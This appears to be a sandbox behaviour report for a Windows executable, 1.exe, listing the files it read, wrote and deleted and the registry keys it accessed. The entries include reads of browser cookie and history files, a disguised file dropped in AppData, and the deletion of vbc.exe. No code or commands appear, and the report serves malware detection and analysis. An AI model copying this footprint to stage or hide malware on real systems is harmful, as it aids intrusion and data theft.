C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\1.exe.config C:\Users\Seven01\AppData\Local\Temp\1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\SysWOW64\ntdll.dll C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029 C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44 C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4 C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6 C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2 C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e C:\Windows\sysnative\LogFiles\Scm\d43319d0-ba2c-48b0-9b29-b1f6e9b74360 C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428 C:\Windows\sysnative\it-IT\radarrs.dll.mui C:\Windows\sysnative\it-IT\faultrep.dll.mui C:\Windows\sysnative\winxp\triage.ini C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui C:\Windows\sysnative\it-IT\wer.dll.mui C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt C:\Windows\sysnative\taskhost.exe C:\Windows\sysnative C:\Windows\sysnative\it-IT\kernel32.dll.mui C:\Windows\sysnative\kernel32.dll C:\Windows\sysnative\it-IT\ntdll.dll.mui C:\Windows\sysnative\ntdll.dll C:\Windows\sysnative\sqmapi.dll C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp C:\Windows\sysnative\KERNELBASE.dll C:\Windows\sysnative\msvcrt.dll C:\Windows\sysnative\ole32.dll C:\Windows\sysnative\gdi32.dll C:\Windows\sysnative\user32.dll C:\Windows\sysnative\lpk.dll C:\Windows\sysnative\usp10.dll C:\Windows\sysnative\rpcrt4.dll C:\Windows\sysnative\oleaut32.dll C:\Windows\sysnative\imm32.dll C:\Windows\sysnative\msctf.dll C:\Windows\sysnative\advapi32.dll C:\Windows\sysnative\sechost.dll C:\Windows\sysnative\api-ms-win-core-synch-l1-2-0.DLL C:\Windows\sysnative\sspicli.dll C:\Windows\sysnative\CRYPTBASE.dll C:\Windows\sysnative\clbcatq.dll C:\Windows\sysnative\RacEngn.dll C:\Windows\sysnative\aepic.dll C:\Windows\sysnative\version.dll C:\Windows\sysnative\tzres.dll C:\Windows\sysnative\it-IT\tzres.dll.mui C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp
Write Files
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Users\Seven01\AppData\Roaming\6MO7-P2A\6MOlogim.jpeg C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER44B6.tmp.appcompat.txt C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER491C.tmp.WERInternalMetadata.xml C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER49AA.tmp.hdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER6EC7.tmp.mdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\Report.wer
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CMF\Config HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\1.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\102652EB HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize 